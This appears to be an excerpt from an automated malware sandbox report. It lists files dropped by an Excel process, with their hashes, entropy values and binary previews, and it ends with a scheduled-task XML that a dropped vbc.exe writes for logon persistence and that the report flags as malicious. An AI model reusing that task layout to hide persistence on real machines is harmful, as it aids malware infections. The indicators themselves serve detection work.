                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                          Category:dropped
                          Size (bytes):8815
                          Entropy (8bit):7.944898651451431
                          Encrypted:false
                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                          MD5:F06432656347B7042C803FE58F4043E1
                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                          Malicious:false
                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FA80342.png
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):49744
                          Entropy (8bit):7.99056926749243
                          Encrypted:true
                          SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                          MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                          SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                          SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                          SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                          Malicious:false
                          Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\88F99796.png
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):84203
                          Entropy (8bit):7.979766688932294
                          Encrypted:false
                          SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                          MD5:208FD40D2F72D9AED77A86A44782E9E2
                          SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                          SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                          SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                          Malicious:false
                          Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8BE733AE.png
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):84203
                          Entropy (8bit):7.979766688932294
                          Encrypted:false
                          SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                          MD5:208FD40D2F72D9AED77A86A44782E9E2
                          SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                          SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                          SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                          Malicious:false
                          Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AC8CDDA9.jpeg
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                          Category:dropped
                          Size (bytes):7006
                          Entropy (8bit):7.000232770071406
                          Encrypted:false
                          SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                          MD5:971312D4A6C9BE9B496160215FE59C19
                          SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                          SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                          SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                          Malicious:false
                          Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B49FB8A3.png
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):6815
                          Entropy (8bit):7.871668067811304
                          Encrypted:false
                          SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                          MD5:E2267BEF7933F02C009EAEFC464EB83D
                          SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                          SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                          SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                          Malicious:false
                          Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD8CC067.jpeg
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                          Category:dropped
                          Size (bytes):85020
                          Entropy (8bit):7.2472785111025875
                          Encrypted:false
                          SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                          MD5:738BDB90A9D8929A5FB2D06775F3336F
                          SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                          SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                          SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                          Malicious:false
                          Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE46765B.png
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):6815
                          Entropy (8bit):7.871668067811304
                          Encrypted:false
                          SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                          MD5:E2267BEF7933F02C009EAEFC464EB83D
                          SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                          SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                          SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                          Malicious:false
                          Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C2286014.jpeg
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                          Category:dropped
                          Size (bytes):8815
                          Entropy (8bit):7.944898651451431
                          Encrypted:false
                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                          MD5:F06432656347B7042C803FE58F4043E1
                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                          Malicious:false
                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CBB16E31.emf
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                          Category:dropped
                          Size (bytes):7592
                          Entropy (8bit):5.451659431863214
                          Encrypted:false
                          SSDEEP:96:zn6ezcqblJaXn/08pnDp0d7vilxL01/G37uVH1oL6lcQtoVhZxGOme3SBwi:bYSTxK/LA/FVoL3QtKhn+e3+wi
                          MD5:33A26E06B598E6EB21A5A9D6803E3685
                          SHA1:7CEFA94D1E43A1D0E4CCC4077F3AAA7D05EFF3E9
                          SHA-256:EE7764EB470B892D4B960100A84E677E394FA9C94323D36673188081BDCD8B6A
                          SHA-512:F8846BC66EE1BF883BCC7C014F369DF7CEDC2DEA1D05B4BAB532CE8FC50D4C979F0B69338E16737E27581BC1D5C2BA700378AEC269F7B6F38F720C58EA6453F7
                          Malicious:false
                          Preview: ....l...(.......e...<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I...................................................M.6.).X.....-.d...................T.........p....\...T.......T.........p....T...<5.u..p....`.p..M.$y.w.|7...>.....x......w..7.$.......d............^.p.....^.p.u7..|7.......>.-........<.w................<.9u.Z.v....X..\......M........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .........................................................................................................................................................................................................................................HD?^KHCcNJFfOJFiQMHlSPJoUPLrWRMvYSPx[UR{]XQ~^XS._ZT.a[U.c\U.e^V.e^X.g`Y.hbY.jaZ.jb\.ld].ld].nd^.nf^.
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CCB31E7E.emf
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                          Category:dropped
                          Size (bytes):648132
                          Entropy (8bit):2.8123789337117007
                          Encrypted:false
                          SSDEEP:3072:734UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:z4UcLe0JOcXuunhqcS
                          MD5:84C99883699958781A0C4E4E07AF6CA3
                          SHA1:8348F280901E992950BF55075207C2CE5DBD0FC5
                          SHA-256:10F76E59987622C1FB6BB33BAF6E5B69F874AA3DA41BA1133036F363FC416B92
                          SHA-512:C7FB740EFDD0250DEEED50B74D34FFD854DA8D23D1932FBE97C8E8F4A424A86C74C6A0B7933453FAA15E24A8B91F5C388C19A258AEBCA6F4FFCEEB9A53D42FBD
                          Malicious:false
                          Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i.....................................................6Y$...l...-z?Y.@..%...H...............p....N.Z............X........N.Z........ ....y?Y........ .........L..z?Y........................................%...X...%...7...................{$..................C.a.l.i.b.r.i...........|...X.................L....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D7985248.png
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PNG image data, 684 x 477, 8-bit/color RGBA, non-interlaced
                          Category:dropped
                          Size (bytes):33795
                          Entropy (8bit):7.909466841535462
                          Encrypted:false
                          SSDEEP:768:mEWnXSo70x6wlKcaVH1lvLUlGBtadJubNT4Bw:mTDQx6XH1lvYlbdJux4Bw
                          MD5:613C306C3CC7C3367595D71BEECD5DE4
                          SHA1:CB5E280A2B1F4F1650040842BACC9D3DF916275E
                          SHA-256:A76D01A33A00E98ACD33BEE9FBE342479EBDA9438C922FE264DC0F1847134294
                          SHA-512:FCA7D4673A173B4264FC40D26A550B97BD3CC8AC18058F2AABB717DF845B84ED32891F97952D283BE678B09B2E0D31878856C65D40361CC5A5C3E3F6332C9665
                          Malicious:false
                          Preview: .PNG........IHDR..............T+....)iCCPicc..x..gP......}..m....T).HYz.^E...Y."bC..D..i. ...Q).+.X...X.,....."*(.G.L.{'?..z.w.93..".........~....06|G$/3........Q@.......%:&.......K....\............JJ.. ........@n..3./...f._>..L~...... ......{..T.|ABlL..?-V...ag.......>.......W..@..+..pHK..O.....o....................w..F.......,...{....3......].xY..2....( .L..EP.-..c0.+..'p.o..P..<....C....(.........Z...B7\.kp...}..g .)x.......!"t... J.:...#...qB<.?$..@.T$..Gv"%H9R.4 -.O....r..F. ..,.'...P..D.P....\...@.qh.....{.*..=.v....(*D...`T..)cz..s...0,..c[.b..k..^l.{...9.3..c..8=........2p[q....I\.....7...}....x].%...........f|'..~.?..H .X.M.9...JH$l&....:.W..I...H.!......H..XD.&."^!.....HT....L.#...H..V.e..i..D.#..-...h.&r....K.G."/Q.)..kJ.%...REi...S.S.T.....@.N.....NP?.$h:4.Z8-...v.v.....N.k...at.}/..~....I.!./.&.-.M.V.KdD.(YT].+.A4O.R...=.91.....X..V.Z..bcb...q#qo...R.V...3.D...'.h.B.c..%&..C....1v2..7.SL.S...Ld.0O3.....&.A......$.,...rc%..XgY.X_....R1R{..F.....
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E3C21.jpeg
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
                          Category:dropped
                          Size (bytes):7006
                          Entropy (8bit):7.000232770071406
                          Encrypted:false
                          SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
                          MD5:971312D4A6C9BE9B496160215FE59C19
                          SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
                          SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
                          SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
                          Malicious:false
                          Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB16E0D.jpeg
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
                          Category:dropped
                          Size (bytes):14198
                          Entropy (8bit):7.916688725116637
                          Encrypted:false
                          SSDEEP:384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
                          MD5:E8FC908D33C78AAAD1D06E865FC9F9B0
                          SHA1:72CA86D260330FC32246D28349C07933E427065D
                          SHA-256:7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
                          SHA-512:A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
                          Malicious:false
                          Preview: ......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.*5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...|5.2...*..%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......|j.4.mn..Ke!G.6*PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q*[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.|..10........... ..l..|F...E9*...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.*V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...
                          C:\Users\user\AppData\Local\Temp\tmpC2C3.tmp
                          Process:C:\Users\Public\vbc.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1623
                          Entropy (8bit):5.151874158539518
                          Encrypted:false
                          SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB1tn:cbhZ7ClNQi/rydbz9I3YODOLNdq35
                          MD5:BA783CA7A8915209F0E505AB316F75E8
                          SHA1:CB48105F936AA45AD92CD15706FA19AF55F0A00E
                          SHA-256:F2B3B599444E1A7EA5AD013A840F3D1B06A7F0D01FAB9DD435A25E899D3D7E0B
                          SHA-512:069FE3727D1DA6FF4693E3FD63A4A2C8D78DF3C2C567D54AD3136E49F84C15C0F17BDE4F9EBB2569943B4064E586A2EEDA45090F89B916CBD758A1BF2A725292
                          Malicious:true
                          Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                          C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\catalog.dat
                          Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2376
                          Entropy (8bit):7.012278113302776
                          Encrypted:false
